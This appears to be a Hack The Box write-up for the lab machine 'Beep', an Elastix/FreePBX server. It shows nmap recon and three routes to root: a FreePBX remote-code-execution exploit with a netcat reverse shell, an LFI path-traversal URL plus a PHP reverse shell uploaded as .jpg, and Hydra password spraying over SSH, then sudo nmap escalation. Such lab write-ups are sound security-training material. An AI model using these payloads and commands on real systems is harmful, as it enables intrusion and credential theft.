Hack The Box: Beep Write-up (#2)

Let’s begin!

Reconnaissance

We start with a quick nmap scan.

nmap -sC -sV -O -oA nmap/basic 10.10.10.7
  • -sC: Default nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats

We got the following results:

  • Port 22 — Running SSH service of version OpenSSH 4.3 (protocol 2.0)
  • Port 25 — Running Simple Mail Transfer Protocol (SMTP) Postfix smtpd
  • Port 80 — Running Web Service Apache httpd 2.2.3
  • Port 110 — Running Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7–7.el5_6.4
  • Port 111 — Running rpcbind service
  • Port 143 — Running Cyrus imapd 2.3.7-Invoca-RPM-2.3.7–7.el5_6.4
  • Port 443 — Running Web Service over SSL (HTTPS) Apache httpd 2.2.3
  • Port 993 — Running Cyrus imapd over SSL
  • Port 995 — Running Cyrus pop3d over SSL
  • Port 3306 — Running MySQL (Version ???)
  • Port 4445 — Running upnotifyp
  • Port 10000 — Running MiniServ 1.570 (Webmin httpd)
Nmap basic scan result

We need to run a full nmap scan to make sure we did not miss any ports. So let's run full nmap scan.

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.7
  • -p-: scan all ports from 1–65535

We got the following results:

  • Port 877 — Running rpcbind service
  • Port 4190 — Running Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7–7.el5_6.4 (included w/cyrus imap)
  • Port 4559 — Running HylaFAX 4.3.10
  • Port 5038 — Running Asterisk Call Manager 1.1
Nmap full scan result

Again, you see we didn't see the above 4 ports in the quick nmap scan. So make this as a habit. We go for the last UDP nmap scan.

nmap -sU -O -p- -oA nmap/udp 10.10.10.7

The scan result for the UDP takes forever. This is because of the way how TCP and UDP Protocols work differently. We can speed up this scan with timing options but there is a risk, reducing the accuracy of your scan. If you are interested, you can read here. So I skipped this scan.

Service Enumeration

I always like to start to enumerate with common service ports that have high chances to get access to the target. Let’s begin with the webserver.

Visit the URL to port 80 redirects us to port 443 (https) with a login form of Elastix application.

Elastix application login page

A quick Google search about “Elastix” reveals it is an unified communications server software that links together IP PBX, emails, IM, faxing and collaboration functionality. IP PBX is a Voice over IP (VoIP) phone system for business. Sounds to me this Beep box is related to the phone system. I tried to log in to this page with default credentials but it didn't work. I also checked the “View Page Source” for hints but nothing interesting is there. Let’s run dirb to enumerate web directory.

dirb  https://10.10.10.7/

We got the following outputs:

Dirb scan result

After I enumerate all the above directories, /admin and /vtigercrm seems to be interesting. Let’s access them.

Admin page

I tried default credential for this page and it did not work as well. But I got version information FreePBX 2.8.1.4. Let’s do a search for CVE information and exploits. Google didn't give much CVE information for this version. Searching in searchsploit gives a list. Particularly this one exploit linked to Elastix software. We will test this in Exploit section.

Searchsploit result

Next, we access to /vtigercrm.

VTiger CRM

We got the version number vtiger CRM 5.1.0. Let’s Google this version number for CVEs and exploits. This version of vtiger CRM is vulnerable to Local File Inclusion (LFI). Here are the CVE-2012–4867 and the exploit.

So I leave this until here and let’s move to the next web service port.

Let’s access to the URL with port 10000.

Login page

We got this login page. I tried default passwords, it blocked the access after 5 failed attempts. Then after 2 to 3 mins, it will be unblocked automatically. I also checked the “View Page Source” nothing interesting is there.

Let’s do quick telnet to this mail service.

telnet 10.10.10.7 25
Telnet to port 25

Good! email service is working and we can see our new email is in a queue. We attack this when others seem to be not working to get access to the target.

These are mail client services required to access email remotely. We need valid credentials to login into these services. We back to this if we find any info in the later section.

These 2 ports are used by rpcbind service. Let’s see if anything interesting by executing the following command:

rpcinfo -p 10.10.10.7
Rpcinfo result

As expected nothing further we can be enumerated.

This is open-source FAX service software. Google search for “HylaFAX 4.3.10” didn't show any CVEs or exploit.

A quick search on this software, it is used to manage calls like transfer calls, maintain current call session and control VoIP phone system. I didn't find any CVEs or exploits.

For MySQL, I can't find the version information. I also tried nmap script to enumerate but it did not work. So I skipped this.

I didn't find much info on this port.

So with that information, Let’s begin our attack.

Exploitation

Method #1

Let’s download the exploit “FreePBX 2.10.0 / Elastix 2.2.0 — Remote Code Execution” to our kali machine.

searchsploit -m exploits/php/webapps/18650.py

We have to edit and fix to this code to bypass SSL verification. Otherwise, you will end up with SSL error.

Fix for SSL verification issue

In the above screenshot, I have added the fix. Please update your lhost, lport and rhost. One more thing, you need to find the correct extension for this exploit to work. I used the default 1000 as per the exploit and it did not work.

The response fails for the default extension 1000

I used this tool called svwar form the GitHub project SIPVicious to automate the process to find the correct extension to get a response.

svwar -m INVITE -e100-500 10.10.10.7

We got the following result.

svwar result

Let’s update our exploit with 233 as the extension value. Alternatively, we can do this by sending the request to Burp Intruder. But you need to be patient for the outcome. Mark your payload like below screenshot.

Payload position

Add your payload value to the list and start the attack.

You will get a different result when the valid extension value hit.

Burp Intruder result

We are good to go to the next step.

On your Kali Linux, set up a netcat listener on port 4444.

nc -nlvp 4444

Execute the Python exploit.

python 18650.py
Netcat listener

We got the shell. Let’s upgrade the shell to a fully interactive shell. Execute this python onliner.

python -c 'import pty; pty.spawn("/bin/bash")'
Reverse shell

Then send this shell to the background by pressing CTRL+Z. After that, execute below command.

stty raw -echo;fg
Reverse shell to fully interactive shell

Now we have a fully interactive shell with tab completion. Now let’s escalate the privilege to root. We follow the method as in the exploit.

Exploit code

Seems like user asterisk in the sudoer list. Let’s check that.

Sudoer options for the user asterisk

That's right. Let’s use nmap interactive mode and get the root shell.

sudo nmap --interactive
Root shell

Nice!

Grab the root flag.

Root flag

Grab the user flag.

User flag

Method #2

We use LFI vulnerability exist in /vtigercrm page. From exploit DB (refer to the exploit link shared earlier) we copy the code and paste in the URL.

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

We got the following result.

LFI result

We can send this request to Burp Repeater and get the response in a nice format.

LFI via Burp Repeater

We take note on the user names that have/bin/bash. We use this for SSH login using a technique called “Password Spraying” with Hydra. Hydra is a remote network brute force password cracking tool.

Let’s find the configuration file location of the asterisk since we are using this LFI in the context of the asterisk. As per the software documentation, the location is at /etc/asterisk/manager.conf. Let’s read the content trough this LFI.

We get back the following result.

Content of asterisk configuration

Now we have a secret. Let’s test in /vtigercrm login page with the username admin.

vtiger CRM admin page

Nice! We successfully login into the admin page. Let’s quickly check the Settings tab for any file upload option or server settings.

This admin page doesn’t have any server settings configured. But we have file upload option under Setting > Company Details.

Setting Page

Kali Linux has web shells. You can find here:

root@kali:~# ls -l /usr/share/webshells/php/
total 44
-rw-r--r-- 1 root root 4515 Aug 18 2015 findsock.c
-rw-r--r-- 1 root root 2800 Aug 18 2015 php-backdoor.php
-rwxr-xr-x 1 root root 3467 Aug 18 2015 php-findsock-shell.php
-rwxr-xr-x 1 root root 5491 Aug 18 2015 php-reverse-shell.php
-rw-r--r-- 1 root root 13585 Aug 18 2015 qsd-php-backdoor.php
-rw-r--r-- 1 root root 328 Aug 18 2015 simple-backdoor.php

I use php-reverse-shell.php for the reverse shell. Edit the file and change the value to your Kali Linux IP and desired port.

PHP web shell

Copy the php-reverse-shell.php to php-reverse-shell.php.jpg. Because only .jpg extension file we can upload.

cp php-reverse-shell.php php-reverse-shell.php.jpg

Set a netcat listener in your Kali Linux.

nc -nlvp 4444

Now upload the php-reverse-shell.php.jpg file and click save button.

Upload PHP reverse shell payload.

We got the shell in the context of user “asterisk”. Now you know what to do next. User asterisk is a member of the sudoer list.

Reverse shell

Again we got the root shell!

Method #3

We use “Password Spraying” technique to test SSH login with the discovered credentials using Hydra. Create a user.txt file with usernames as below.

user.txt file

Now we are ready to run hydra.

hydra -L users.txt -p jEhdIekWmdjE 10.10.10.7 -f -v -t 4 ssh
  • -L: User list
  • -p: Password
  • -f: Exit when a login/pass pair is found
  • -v: Verbose mode
  • -t: Run TASKS number of connects in parallel per target (default: 16)
Hyrda brute force

Awesome! We got successful for root user. Let’s test SSH now.

SSH into Beep box

Nice! Seems like the password being used for many logins.

I tested the https://10.10.10.7:10000 webmin page with username as root and password as jEhdIekWmdjE and it works.

Great! I have shown you 3 different ways how to get into the Beep box and escalate privilege to root.

Attack Strategy Map

I summarised my attack vectors in this map.

Strategy map

Thank you for reading :-) Next box is the Shocker.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.